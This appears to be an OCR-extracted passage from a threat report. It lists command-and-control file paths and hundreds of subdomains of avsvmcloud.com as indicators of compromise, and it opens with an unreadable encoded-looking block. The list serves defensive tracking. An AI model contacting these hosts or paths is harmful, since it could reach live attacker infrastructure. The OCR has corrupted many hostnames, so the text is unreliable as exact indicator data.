WZ75%72%60%28%7 2229%3b% Gas 7 dz Gay GaZb6F7 5Z6ELH3S7 NZS IVS FAGHESI GES SZHAZHC THB 7 HZ7US7 OZHUZGFA7 7ZGeZ6C 
BOF S6 1264%28%7 BSG dS6CL2C%2 OS7 SS 7 2460%29S2 O27 HZ Gas Gas OIS74L72%7 9S 2 GZ 7 4 GaZO9S HIS 7 BGdSZ6CS2eLGFS7 OS 
GSZGC%2BS 2247 SUS SS NS22Z2C%2 OS7SS7 2VGCL2CS2 036646 1%60%7 3465429%3b 404% 09% 09% 7 8Z6dZ6C%20%7 346546046 
4%282360%75%60360%29%3b% Ga% 0a% 09% 7d%2 026346 1%7 836 3%68%28%65%29%2 047 DS? O37 2265%7437537 2%60%2 043 OS3b 
2 047 d%8a%0a%09%7 226547447547 2260%2 04783602604 20%7 246527347 O36 FZ60%7 946554256 F264 79S3bS 8aZ7 day 
8a%66%75%6e0%63%7 N56 976 FZ6E%2 OE4 1 SUN UE ZUZSUNSS 3% 7447246526 126045346 1476465428 46 FS2C42 846046 146046 


The following files are partly accessible at the still active C &C’s, the first one for instance : 


cgi-bin/forms.cgi 
cgi-bin/cert.cgi 
cgi-bin/options.cgi 
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41qsrgg00826m7pgoi602ou6iuirOtrn.appsync-api.us-east-2.avsvmcloud.com 
42fksvt6d4kt8u7jfo8fv5v.appsync-api.us-east-1.avsvmcloud.com 
42gt7i0ndfa9p27jeb9iv5h.appsync-api.us-east-1.avsvmcloud.com 
43roq4vudcf9p80gwh6OgunOiwusouvO.appsync-api.us-east-1.avsvmcloud.com 
45au93jhhic2 7i6igi35.appsync-api.us-west-2.avsvmcloud.com 
46a0da/7k3kdgj07gds2n0e3uho1li2v0o.appsync-api.us-west-2.avsvmcloud.com 
479nogd49lgipapftlfObe2h.appsync-api.us-west-2.avsvmcloud.com 
48dcgcai0c62v25fu30t2st.appsync-api.us-east-2.avsvmcloud.com 
48o0gl0etmirn5isge2sd0g6isuif6vri.appsync-api.us-east-2.avsvmcloud.com 
48vtOmsiltvgOpvifp2sji2v0ee25p.appsync-api.us-east-2.avsvmcloud.com 
495o0sq5ajkqOeili8fhl.appsync-api.us-east-1.avsvmcloud.com 
496e63kdhlcmvk7ierv9.appsync-api.eu-west-1.avsvmcloud.com 
4981veqqleqlq47iqvla.appsync-api.eu-west-1.avsvmcloud.com 
49a4p4fqchtddi7243bfq0g.appsync-api.us-east-1.avsvmcloud.com 
4arnvku5cv86jicg4bn1.appsync-api.us-west-2.avsvmcloud.com 


Abrcv81m4dtObOmfco0ie2sd.appsync-api.eu-west-1.avsvmcloud.com 


AciIhd4navv9q7vhgwh60gun0OowusouvO.appsync-api.us-west-2.avsvmcloud.com 


AdgveYoihjmhulLlobi3f95r.appsync-api.us-east-1.avsvmcloud.com 
4glm1imnha5gkmukf5u0elel.appsync-api.us-east-2.avsvmcloud.com 
Agncu8sn0lo2q4rfu30g2st.appsync-api.us-east-2.avsvmcloud.com 
4h6561a4bkd9o03livr6g.appsync-api.us-east-1.avsvmcloud.com 
4i00rgqu7nbang8g00iesdbOvfheOl45.appsync-api.us-east-1.avsvmcloud.com 
4i7d1v6cs5hh2k5fe2q0i12eul.appsync-api.us-east-1.avsvmcloud.com 
4i7rkgeqkrdb9jqf6d6n0i6jOteu.appsync-api.us-east-1.avsvmcloud.com 
4ivorp1rr9p41krfiwb0i12eul1.appsync-api.us-east-1.avsvmcloud.com 
A4j6cjhk8mc73b28fe2sd0onwn0te2h.appsync-api.us-east-2.avsvmcloud.com 
Ajdicppf8j8dkaigoi60bou6iuirOern.appsync-api.us-east-2.avsvmcloud.com 
Ajdicppf8j8dkapgoi60iouGiuirOern.appsync-api.us-east-2.avsvmcloud.com 
A4kitqklfcam64r6pqvkp.appsync-api.us-west-2.avsvmcloud.com 
Akmjiplb5iir9ulp9ru9.appsync-api.us-west-2.avsvmcloud.com 
4kq6slpb9ank4qcpirdn.appsync-api.us-west-2.avsvmcloud.com 
4kt55bhq19atmu6ovv7fh5r.appsync-api.us-west-2.avsvmcloud.com 
4l43tilm5u4ehObfeul.appsync-api.us-west-2.avsvmcloud.com 
4l4fmlv6ju7svipgOOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 


Aljug4v4fgur9gagvovrqr116326doiu.appsync-api.us-west-2.avsvmcloud.com 
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Altorald3spgu0kgds2n0o03uho1i2v0c.appsync-api.us-west-2.avsvmcloud.com 
4n78t4olhjs39l6pqf20.appsync-api.us-west-2.avsvmcloud.com 
Anhov953hla5vf6ogvlih5d.appsync-api.us-east-2.avsvmcloud.com 
A4olrlg2akbpbvj4f6d6n006jObeu.appsync-api.us-east-1.avsvmcloud.com 
4og2ki2t8s31t6dfep60i12eul.appsync-api.us-east-1.avsvmcloud.com 
Aord6lsjhvifqrobgoi60bouGiuir02rn.appsync-api.us-east-1.avsvmcloud.com 
4p5e97q4jé6luiflppfs6.appsync-api.eu-west-1.avsvmcloud.com 
Apnsqokvndbiuk6oofuf95I.appsync-api.eu-west-1.avsvmcloud.com 
Aqsqf06i5s04vi7gt3q8.appsync-api.us-east-1.avsvmcloud.com 
Asinhr9lhcdi3e7j2bd3v51.appsync-api.us-west-2.avsvmcloud.com 
4t4bhjpfuvh8o3lur3if307.appsync-api.us-west-2.avsvmcloud.com 
Atfnvnohonj9j46ufm9ii01.appsync-api.us-east-2.avsvmcloud.com 
AtilqOhf7ems2v6gdfkp.appsync-api.us-west-2.avsvmcloud.com 
Atqj85ig0aal756umogii07.appsync-api.us-west-2.avsvmcloud.com 
4u8bhia6bueea9 7jemfif51.appsync-api.us-east-2.avsvmcloud.com 
4ur2b068772s66cn33n3.appsync-api.us-west-2.avsvmcloud.com 
4urplgagOvhi5g6j2b9fv5h.appsync-api.us-east-2.avsvmcloud.com 
A4vicc4cmvotped1fe2q0c12eul.appsync-api.eu-west-1.avsvmcloud.com 
50rqa49can6scv93nidv.appsync-api.eu-west-1.avsvmcloud.com 
527iot48ki2dgcqti8ha.appsync-api.us-west-2.avsvmcloud.com 
52h7rrlb7f4psu91kcc4ii0.appsync-api.us-east-2.avsvmcloud.com 
52iqfedjtjtjii9 1cj843iv.appsync-api.us-west-2.avsvmcloud.com 
5336qh70uos4vbO0gt1f0ie2h.appsync-api.us-west-2.avsvmcloud.com 
5317etqvajpfr82h00mudofi/5f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
53to5|3lo2nud4ugce256u0te2h02us.appsync-api.us-west-2.avsvmcloud.com 
54mp89mnbi2dr6q11j24ii7.appsync-api.us-east-2.avsvmcloud.com 
5667k3rv2rubelthnrihosOkts2fd0os.appsync-api.us-east-1.avsvmcloud.com 
5688hh6ho4p176o0h00iesdbOvfhedl45.appsync-api.us-east-1.avsvmcloud.com 
56fk8043u6pnu7rg2eul.appsync-api.us-east-1.avsvmcloud.com 

56t2 1Lhjkejopieug6d6n0c6jOceu.appsync-api.us-east-1.avsvmcloud.com 
57bmrklas7nvOn0Ogeul6cOt2st.appsync-api.us-east-1.avsvmcloud.com 
57mM839c109klaj8hO0iesdbOvfhe0l45.appsync-api.us-east-1.avsvmcloud.com 
58b8f8go025f04rpgc2d0be2h0gdj.appsync-api.eu-west-1.avsvmcloud.com 
59jlueje4mvk494hqgad2ri.appsync-api.us-east-2.avsvmcloud.com 


59119pcnvppj9r93e73r.appsync-api.us-west-2.avsvmcloud.com 
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59pgr50h710g2u93s733.appsync-api.us-west-2.avsvmcloud.com 
5a97vkcil18In1952864brh.appsync-api.us-east-1.avsvmcloud.com 
5agvobc70o2ivk95a6c4fr1l.appsync-api.eu-west-1.avsvmcloud.com 
5blge9hb2rinpp7hoi602o0u6iuirOtrn.appsync-api.us-east-2.avsvmcloud.com 
5b7rcc9qeu4qtu8g12eul.appsync-api.us-east-2.avsvmcloud.com 
5ba54io0mb6ureoph5o063rscusi2vove0.appsync-api.us-east-2.avsvmcloud.com 
5btjo4rcbp3tiq8bo6t.appsync-api.us-east-1.avsvmcloud.com 
5c4d2c05t3e392fhwh60gun0twusouvO.appsync-api.us-east-1l.avsvmcloud.com 
5cc19c6bgu6jn6éfhOOhuauoO0figqtkgb4.appsync-api.us-east-1.avsvmcloud.com 
5ce289jle8jpoq2g6d6n006jOceu.appsync-api.us-east-1.avsvmcloud.com 
5d098eoerilg4qqegge0.appsync-api.us-east-2.avsvmcloud.com 
5d6ehglhbk6gro4eml2s.appsync-api.us-west-2.avsvmcloud.com 
5d9e579ijnsp1j4egliv.appsync-api.us-east-2.avsvmcloud.com 
5dcihj4h4i6ig34erle9.appsync-api.us-west-2.avsvmcloud.com 
5dq72bpo2h9i304en78n.appsync-api.us-west-2.avsvmcloud.com 
5evtlhv2a5hhnfq8gjjj.appsync-api.us-west-2.avsvmcloud.com 
5fbprol6v2090d3ggg8tap.appsync-api.us-west-2.avsvmcloud.com 
5fdb00ph4tu3mobhwh60eun02wusouvO.appsync-api.us-west-2.avsvmcloud.com 
5fg73t47qgdfd83h00mudofi/5f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
5fjujoold6af000gtj6h0g12eul.appsync-api.us-west-2.avsvmcloud.com 
5f19kKOdd4qlv4ibh5onrloipe2hh0el2.appsync-api.us-west-2.avsvmcloud.com 
5ge5g8qdjcfbdl1lge2q0e1l2eul.appsync-api.eu-west-1.avsvmcloud.com 
5h6ju6akl9urof936791.appsync-api.us-east-2.avsvmcloud.com 
5hccp8i2dn0pr5435gei.appsync-api.us-west-2.avsvmcloud.com 
5ildfbdql2osardhds2n0i3uholi2v02.appsync-api.us-west-2.avsvmcloud.com 
5i2m38frjj8funkhwh60tunOewusouvO.appsync-api.us-west-2.avsvmcloud.com 
5iat8b7ub86lrOegcuveervisul0te2h.appsync-api.us-west-2.avsvmcloud.com 
5ig5c6csfj4mdgkhO04udkr2ftq4qnfm.appsync-api.us-west-2.avsvmcloud.com 
5igutvd2sealpupg02e2h.appsync-api.us-west-2.avsvmcloud.com 
5jb9cmvm9pjj8vig261rs3e022st.appsync-api.eu-west-1.avsvmcloud.com 
5062p6s87utijjghrOlon621fio2v60c.appsync-api.us-west-2.avsvmcloud.com 
5086997 7u344mohgt1f0ie2h.appsync-api.us-west-2.avsvmcloud.com 
5p72thpmihr3mo9fplc4eil.appsync-api.us-east-2.avsvmcloud.com 
5pm72cpodh9po04en1tn.appsync-api.us-west-2.avsvmcloud.com 
5q2qd28337f22pq5q8bqork.appsync-api.us-east-2.avsvmcloud.com 
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5qbtj04rcbp3tiq8bo6t.appsync-api.us-east-1l.avsvmcloud.com 
5qllb8j4t2sgvs98kj27.appsync-api.us-east-2.avsvmcloud.com 
5rcl3g6esq4cumug/11e.appsync-api.us-east-2.avsvmcloud.com 
5rhqup3g159rvdtgu30g2st.appsync-api.us-east-2.avsvmcloud.com 
5s4fo7e487 7a2vd1a82qii0.appsync-api.us-east-1.avsvmcloud.com 
5u99qgeaatrqpef4lucp4ii7.appsync-api.us-east-1.avsvmcloud.com 
5ucjki4riknsakqlp6q4ri7.appsync-api.us-east-1.avsvmcloud.com 
5vd09ek9rbd8r99gh.appsync-api.us-east-2.avsvmcloud.com 
5vsivtapld93b9ggoid60bfjObvri.appsync-api.us-east-2.avsvmcloud.com 
60doacaptl4ufcjejif6qcn.appsync-api.us-east-2.avsvmcloud.com 

610011 7ptgqa9i5he2mvridee2m0ce2h.appsync-api.us-east-2.avsvmcloud.com 
616v2nvri9ngud0ig535z0i3rq1rii0g.appsync-api.us-east-2.avsvmcloud.com 
617stsr6ntepOauho2v60be2h.appsync-api.us-east-2.avsvmcloud.com 
61kaOn5p25hqs6liq22nsf55096uqprs.appsync-api.us-east-2.avsvmcloud.com 
610333t53ubv3fdhtj6h0g12eul.appsync-api.us-east-2.avsvmcloud.com 
6lofp3rbssea545i0i60eouGiuirOcrn.appsync-api.us-east-2.avsvmcloud.com 
63103hgeg7hiuuahscr0g6j02eu.appsync-api.us-east-1.avsvmcloud.com 
632h4s239tlejf6i00iesdbOvfhe0l45.appsync-api.us-east-1.avsvmcloud.com 
63e4i0i8dngflashl.appsync-api.us-east-1.avsvmcloud.com 
66av2e6hb14vn6shenu02e2sd.appsync-api.us-west-2.avsvmcloud.com 
66p07i585lilurdhou0ee2h.appsync-api.us-west-2.avsvmcloud.com 
67rjs2cgl778pljhOlqqtobmv1.appsync-api.us-west-2.avsvmcloud.com 
68bfi3v6skqal4pioi602ou6iuirO0irn.appsync-api.us-east-2.avsvmcloud.com 
6990f4toolgtraje9fr7ecl.appsync-api.us-east-1.avsvmcloud.com 
6almruvuaunbdt811b9i.appsync-api.us-west-2.avsvmcloud.com 
6a57jk2bald9keg15cbg.appsync-api.eu-west-1.avsvmcloud.com 
6aos6mvt2k3ncngt9or7mcO0.appsync-api.us-east-2.avsvmcloud.com 
6c2d2uha76cli7hhtlfOee2h.appsync-api.us-west-2.avsvmcloud.com 
6c579uiq2502q4hi00mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
6c5tqtlBm61258khe2h.appsync-api.us-west-2.avsvmcloud.com 
6cb9jk59c9qb6cthfnru9l4p5tj5vof.appsync-api.us-west-2.avsvmcloud.com 
6cd64117t0arg8hids2n0e3uho1li2v0e.appsync-api.us-west-2.avsvmcloud.com 
6cgiqb15s82mdnti0024|6bvvgjtdi30.appsync-api.us-west-2.avsvmcloud.com 
6elrttculr6lsbgtvbcfm65.appsync-api.us-east-1.avsvmcloud.com 
6fgvmcb6q9lrdt5 1i0DOmudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
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6fndhoavfj70774hfgge.appsync-api.us-east-1.avsvmcloud.com 
6g58ps634jn2jqshiup12s5ush60ee2h.appsync-api.us-east-2.avsvmcloud.com 
6gbi5onhfkcck28hul.appsync-api.us-east-2.avsvmcloud.com 
6gc819kpm58pmggh5u0elel.appsync-api.us-east-2.avsvmcloud.com 
6ghau746mseljcthim0e2st.appsync-api.us-east-2.avsvmcloud.com 
6gk48cm1q8t4ihOh6hr60b2st.appsync-api.us-east-2.avsvmcloud.com 
6gp98d4asbjpu4gh53e0i12eul.appsync-api.us-east-2.avsvmcloud.com 
6i6gkuq4rrqj9n8h6d6n0e6jOieu.appsync-api.us-east-1l.avsvmcloud.com 
6i6n1qgj6b520269he2q0b12eul.appsync-api.us-east-1.avsvmcloud.com 
6iivv86mM9 7|d50hi0Omudofi75f4tjvh.appsync-api.us-east-1l.avsvmcloud.com 
6jlba655onr4icOircrOge20ts2uv2jr.appsync-api.us-east-2.avsvmcloud.com 
6ja3j5thv6vsmrOhu30b2st.appsync-api.us-east-2.avsvmcloud.com 
6jef5kkueaulhv8i656o00c6irusv6cuv.appsync-api.us-east-2.avsvmcloud.com 
6n05denedda4fgjh2ifl.appsync-api.us-west-2.avsvmcloud.com 
6njr6éslubipgel83lfd798r.appsync-api.us-west-2.avsvmcloud.com 
60c69if816j520 Liwn6O0gunOtwusouvO.appsync-api.us-east-1.avsvmcloud.com 
60c69if816j520fiwn60bun02wusouv0O.appsync-api.us-east-1.avsvmcloud.com 
6o0gkkniro15IrrhiuhsOce2sdO02ovirl.appsync-api.us-east-1.avsvmcloud.com 
6orv98cc9cgd10ri00mudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
60s7i8vlah9pOcnhsee5Obsf.appsync-api.us-east-1.avsvmcloud.com 
6ouhdu2e9ufegvsi00iesdbOvfhe0l45.appsync-api.us-east-1l.avsvmcloud.com 
6r2prvobs5q5bbdhOfeaaso.appsync-api.eu-west-1.avsvmcloud.com 
6rqj6h3nhg8kgjsivrqnosreio2v60gj.appsync-api.eu-west-1.avsvmcloud.com 
6rth4r9nv4kmf80hc2d0ce2hOtdj.appsync-api.eu-west-1.avsvmcloud.com 
6soimlqlm3o0jum85rmsv.appsync-api.us-west-2.avsvmcloud.com 
6st5ro5te4tohg852bmr.appsync-api.us-west-2.avsvmcloud.com 
6su5ri5t34tjhg852bbn.appsync-api.us-west-2.avsvmcloud.com 
6tgmn6eviblvpqitb3273c0.appsync-api.us-west-2.avsvmcloud.com 
6tjljelot3qiv6jt7bnI3cv.appsync-api.us-east-2.avsvmcloud.com 
6tkq6jd1ltqmdqlj18omf.appsync-api.us-west-2.avsvmcloud.com 
6u9fvOUI1M48tp18jbk7b89.appsync-api.us-east-2.avsvmcloud.com 
6ubqfsdrpcms8h188mnlv8f.appsync-api.us-east-2.avsvmcloud.com 
6uf4bacjOcp4ss858303.appsync-api.us-west-2.avsvmcloud.com 

6ujti6 lfesldrg88ib6bf81.appsync-api.us-east-2.avsvmcloud.com 


6umd9csp9vl2j2j56itv.appsync-api.us-west-2.avsvmcloud.com 
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72kp1jmgnfugmje81clkfj1.appsync-api.us-east-2.avsvmcloud.com 
734903up6eu17 qijoi6Oiou6iuirOgrn.appsync-api.us-west-2.avsvmcloud.com 
73ccpvrss141140jwh60gunO0owusouvo.appsync-api.us-west-2.avsvmcloud.com 
73f6lq9to5c84gajwh602un0twusouvO.appsync-api.us-west-2.avsvmcloud.com 
73f6lq9to5c84gmjwh60iunOewusouv0.appsync-api.us-west-2.avsvmcloud.com 
74er3bqg23iitqe5lcce.appsync-api.us-west-2.avsvmcloud.com 
7639810eki3245 litvef0il12eul.appsync-api.us-east-1.avsvmcloud.com 
7639810eki3245vitvef0il2eul.appsync-api.us-east-1.avsvmcloud.com 
76609iIM0qg5tm01gicoO0ge2sd.appsync-api.us-east-1.avsvmcloud.com 
773k3vnecfb8rndjwh60cunOgwusouvO.appsync-api.us-east-1.avsvmcloud.com 
77buuacbm1laneOai6d6n0e6jOceu.appsync-api.us-east-1.avsvmcloud.com 
779q364q4irban5jOOmudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
7a2f7va4u69ja6etv8lam6f.appsync-api.us-east-1l.avsvmcloud.com 
7alje57go4l896p1k8kf.appsync-api.us-east-1.avsvmcloud.com 
7c2ucjd62e9s4u4je6videdsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
7cbtailjomqlelpjvr2d32i2voe60ce2.appsync-api.us-east-1.avsvmcloud.com 
7cemp1fblk7ludpi95.appsync-api.us-east-1.avsvmcloud.com 
7couja66mstn304i6d6n0g6jO2eu.appsync-api.us-east-1.avsvmcloud.com 
7dsclk69i6r5ish30Irs9jg.appsync-api.us-west-2.avsvmcloud.com 
7edto9g8g0ekmlele8go.appsync-api.us-west-2.avsvmcloud.com 
7f000qp40q07qj6j5onrloipe2hh0g12.appsync-api.us-west-2.avsvmcloud.com 
7f05rn251hga3igie6u0b12eul.appsync-api.us-west-2.avsvmcloud.com 
7f05rn251hga3iiie6u0e1l2eul.appsync-api.us-west-2.avsvmcloud.com 
7f05rn251hga3ikie6u0cl2eul.appsync-api.us-west-2.avsvmcloud.com 
7f05rn251hga3ipie6u0g12eul.appsync-api.us-west-2.avsvmcloud.com 
7h2rts6hpbdl9a2e3lmle6n.appsync-api.us-east-2.avsvmcloud.com 
7joflcOfqp8drocijrouv20212eul.appsync-api.eu-west-1.avsvmcloud.com 
7joh5f2ss7d6v3nie2q0el2eul.appsync-api.eu-west-1.avsvmcloud.com 
7k3p7gkg98056q2381kahjn.appsync-api.us-east-1.avsvmcloud.com 
7k8q07tr3scib2h3jlia9jrappsync-api.us-east-1.avsvmcloud.com 
7kdh6ghcitbt6o02hplh2.appsync-api.eu-west-1.avsvmcloud.com 
7lLom4ljtqOb36njuhsO2e2sdO0bovirl.appsync-api.us-east-1.avsvmcloud.com 
713nb77le9idvOhjOOmudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
7luke58qlpinhpOiov500neOovri.appsync-api.us-east-1.avsvmcloud.com 
7m3anm7jn931mctjovidc1fj2010zovi.appsync-api.us-east-2.avsvmcloud.com 
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7mlobqm8é6f3dieniv6q3ruli30evri.appsync-api.us-east-2.avsvmcloud.com 
7obj2bi86vlvu2qgj00qg49s20f12ql200.appsync-api.us-west-2.avsvmcloud.com 
7ohaeanmhdjihefjOOmudofi7 5f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
7omc2fr6sgs1829jwh60cun02wusouvO0.appsync-api.us-west-2.avsvmcloud.com 
7pg97md52hed09h3c7qshjg.appsync-api.us-east-2.avsvmcloud.com 
7951438pc893gk2146f3.appsync-api.us-west-2.avsvmcloud.com 
7qcnbheggmf2ae2ticsam6v.appsync-api.us-west-2.avsvmcloud.com 
7qr0hdaahg9cad2ta66sicv.appsync-api.us-west-2.avsvmcloud.com 
7roqd00d3npukh7jq535z0e3rq1rii0g.appsync-api.us-east-2.avsvmcloud.com 
7rcfm22r7tfq3kfid0o1l.appsync-api.us-east-2.avsvmcloud.com 
7riatumjO5rirstiu30g2st.appsync-api.us-east-2.avsvmcloud.com 
7rjv8p3pijm3b25ip2sji2v00e25p.appsync-api.us-east-2.avsvmcloud.com 
7ro74qnpv7t2 1libit}j6hOt12eul.appsync-api.us-east-2.avsvmcloud.com 
7sbvaemscsOmc925tb99.appsync-api.us-west-2.avsvmcloud.com 
7t47ki8634t7dl2t16fam6h.appsync-api.us-east-1l.avsvmcloud.com 
7ttrgprfl15p6q9pt1l6sa36f.appsync-api.us-east-1.avsvmcloud.com 
7velvmv7kblqirlieu6ov202dsw.appsync-api.us-east-2.avsvmcloud.com 
7vehkkolbf1lhfniu30t2st.appsync-api.us-east-2.avsvmcloud.com 
807rleiftdh2lo5hg1374md.appsync-api.us-east-1.avsvmcloud.com 
80hvsoac6s30fsnhl8r6hmk.appsync-api.us-east-1.avsvmcloud.com 
814jt4mrf7cg2dej6d6n0e6jOieu.appsync-api.us-east-1.avsvmcloud.com 
814jt4mrf7cg2dmj6d6n0g6jO2eu.appsync-api.us-east-1.avsvmcloud.com 
81jsr14f06rvqrbks6i0iui Luvio6Okd.appsync-api.us-east-1.avsvmcloud.com 
81tgvivs9pnrbp7kOOmudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
820b68u8ual7cpttb6qn.appsync-api.us-east-2.avsvmcloud.com 
82a9tlio21hh5rule6a6m30.appsync-api.us-east-2.avsvmcloud.com 
82pu0988gcekaltte8lq.appsync-api.us-west-2.avsvmcloud.com 
849004nju9hr3kttuclb.appsync-api.us-west-2.avsvmcloud.com 
84foosm8s82rscttfcOg.appsync-api.us-west-2.avsvmcloud.com 
85k2agg2je4r50th1llgc4mr.appsync-api.us-east-1.avsvmcloud.com 
882j84blfc8god6j6d6n0g6jOceu.appsync-api.us-east-1.avsvmcloud.com 
887ccSmcmijtbrpkjf6é.appsync-api.us-east-1.avsvmcloud.com 
8994g10r2oflont3k7br.appsync-api.us-west-2.avsvmcloud.com 
89a9s7204199qcthilu64mk.appsync-api.us-east-2.avsvmcloud.com 
89uqbs3qlq8667nhc7ml2md.appsync-api.us-west-2.avsvmcloud.com 
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8arl77p3fabr7v55njqcom9.appsync-api.us-east-1.avsvmcloud.com 
8b6vf620g4056udkoi60gou6iuirOcrn.appsync-api.us-west-2.avsvmcloud.com 
8b708b5ul9udisShkwh60oun02wusouv0.appsync-api.us-west-2.avsvmcloud.com 
8bflq9t3c4dcp7 7je6u0il2eul.appsync-api.us-west-2.avsvmcloud.com 
8bqaeglInl65jthkwh60cunOgwusouv0O.appsync-api.us-west-2.avsvmcloud.com 
8buugki79g4jlp0j6es22i0ie2h.appsync-api.us-west-2.avsvmcloud.com 
8clsd3hddsdtbntjh2vei2v0b12e.appsync-api.eu-west-1.avsvmcloud.com 
8dighkeh63clufuedika.appsync-api.us-west-2.avsvmcloud.com 
8dpdidaujmnitutej6l0.appsync-api.us-west-2.avsvmcloud.com 
8dsuu8qclignkd5f37icp3d.appsync-api.us-west-2.avsvmcloud.com 
8f9b5mbpuje4lutke2sd0t6isuif6vri.appsync-api.us-east-2.avsvmcloud.com 
8fal4r2nbims506jjOee2h.appsync-api.us-east-2.avsvmcloud.com 
8fqcl6riseq54bukovi021fj201090vi.appsync-api.us-east-2.avsvmcloud.com 
8g6ef235pp9h073k00iesdbOvfhedl45.appsync-api.us-east-1.avsvmcloud.com 
8h4meutddgh65en3nlen.appsync-api.us-east-2.avsvmcloud.com 
8h7get2fkimdgvu3d1h8.appsync-api.us-west-2.avsvmcloud.com 
8i36ujvj4ikulv5koi60eou6iuirOern.appsync-api.us-east-2.avsvmcloud.com 
8i8fahjtirhk2Inju30g2st.appsync-api.us-east-2.avsvmcloud.com 
8i9baf9giu3h4erj9u.appsync-api.us-east-2.avsvmcloud.com 
8j024avi0h142m5kuhsOge2sdO0iovirl.appsync-api.us-east-1.avsvmcloud.com 
8j6lopo0j4ngi5djov50ineOgvri.appsync-api.us-east-1.avsvmcloud.com 
8jujl2bkf63gipjj6d6n0c6jO2eu.appsync-api.us-east-1.avsvmcloud.com 
8m1cp2p9qh2p2svkOOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
8n4ep99amg4d6mne712d.appsync-api.eu-west-1.avsvmcloud.com 
801nl8uqrceig9gkt12fer6irswuDivr.appsync-api.us-east-2.avsvmcloud.com 
8odjhig5!11122nkvr2d32i2voe602e2.appsync-api.us-east-2.avsvmcloud.com 
8r64v4ivgvebaqfijtlfObe2h.appsync-api.us-west-2.avsvmcloud.com 
8rvlm9u8cdpci7ije6u0b12eul.appsync-api.us-west-2.avsvmcloud.com 
8tnr4hlq300aq755n6jcbm0.appsync-api.us-east-1.avsvmcloud.com 
8u79vaad128j9antucin.appsync-api.us-east-1.avsvmcloud.com 
90tse2219t7Id5d2hlaeqkp.appsync-api.eu-west-1.avsvmcloud.com 
91pcpellstq5mkOkc2d02e2h0tdj.appsync-api.eu-west-1.avsvmcloud.com 
92n2uphn4uupjc4jv642fnh.appsync-api.us-east-2.avsvmcloud.com 
92v5k3b7h39vqtqnjj67.appsync-api.us-west-2.avsvmcloud.com 
93ueh1k419flevviOOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
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942g3relo33gtvqndc67.appsync-api.us-west-2.avsvmcloud.com 
94qr3b4g2fiil8qqnic8h.appsync-api.us-west-2.avsvmcloud.com 
96547kpaj2s2dl2le6vi0edsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
9666qr1339ujekfluhsOoe2sdO0oovirl.appsync-api.us-east-1.avsvmcloud.com 
96dIh905bab82unkOf8jha6b9fgge.appsync-api.us-east-1l.avsvmcloud.com 
9603vbdoeiusk7ekscr0t6jOeeu.appsync-api.us-east-1.avsvmcloud.com 
978t3k246imjaj5l|00Omudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
97d00c86q6uu2djkv5.appsync-api.us-east-1.avsvmcloud.com 
97gbn1lm22jleff3loi60eouG6iuirOern.appsync-api.us-east-1.avsvmcloud.com 
97v4u78malkdecak6d6n0c6j0ieu.appsync-api.us-east-1.avsvmcloud.com 
97v4u78malkdecek6d6n006jObeu.appsync-api.us-east-1.avsvmcloud.com 
99bo083fkf5tl4kd2p1l2qkr.appsync-api.us-east-2.avsvmcloud.com 
9bdhkuc4n9mufe5lunOc2dioho7rlpOc.appsync-api.us-east-2.avsvmcloud.com 
9bk06jmpsobi3qfku30t2st.appsync-api.us-east-2.avsvmcloud.com 
9c30uck95r220evluhsOge2sdOtovirl.appsync-api.us-east-1.avsvmcloud.com 
9cf4j7jca8nd3c4k6d6n0c6jOceu.appsync-api.us-east-1.avsvmcloud.com 
9cf4j7jca8nd3cbk6d6n026j02eu.appsync-api.us-east-1.avsvmcloud.com 
9cjkkas8eagv90el52si6hoi3 Locsusp.appsync-api.us-east-1.avsvmcloud.com 
9clddtg984cnq8plOOmudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
9e518ggngqeia7qut6lf3k9.appsync-api.us-east-2.avsvmcloud.com 
9e8u299tvm35pequ58le3kh.appsync-api.us-west-2.avsvmcloud.com 
9ecf56hoom3lfu4gj80e.appsync-api.us-west-2.avsvmcloud.com 
Yepu5ciujco9mBduncbe3kf.appsync-api.us-east-2.avsvmcloud.com 
9f1lbipv24b31grol00q49s2o0f12qI200.appsync-api.us-west-2.avsvmcloud.com 
9fbokvp2utgmbuulwh602un0twusouvO.appsync-api.us-west-2.avsvmcloud.com 
9fg3iqfqb8hv5rnlwh60eunO0twusouvoO.appsync-api.us-west-2.avsvmcloud.com 
9fs9rj4nhh8e32lke6u0g12eul.appsync-api.us-west-2.avsvmcloud.com 
9h5v1ind56hGjrrgiglev.appsync-api.us-east-2.avsvmcloud.com 
914e3706147IffklOOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
914e3706147IfflloOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
9iI5qvOgsn99hdvukre2e2sd0b12eul.appsync-api.us-west-2.avsvmcloud.com 
9i96cr8078dhv7tk02e2h.appsync-api.us-west-2.avsvmcloud.com 
9iqli2obrorl9b0kovv2fidge2sd.appsync-api.us-west-2.avsvmcloud.com 
9jmb3qd8ugt495uke3e0gn2h.appsync-api.eu-west-1l.avsvmcloud.com 
9jvO5e4ab7qgovhdke2q0b12eul.appsync-api.eu-west-1.avsvmcloud.com 
12671 


9kqllusc45qaju901I8ehnd.appsync-api.eu-west-1.avsvmcloud.com 
9lj6mrg83qsj3kiluhsO2e2sdO0bovirl.appsync-api.us-east-1.avsvmcloud.com 
9lkb323g703uo0fqleoip256uesuhrvi2.appsync-api.us-east-1.avsvmcloud.com 
9005i9sf42hvcfkloi60iouGiuirOgrn.appsync-api.us-west-2.avsvmcloud.com 
9041pmag4t8jvmq2lOOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
90c14sgc4n0pt7 1lexr08ovirsvul0ee.appsync-api.us-west-2.avsvmcloud.com 
9pajf305pg8p7fqp9j3h.appsync-api.us-west-2.avsvmcloud.com 
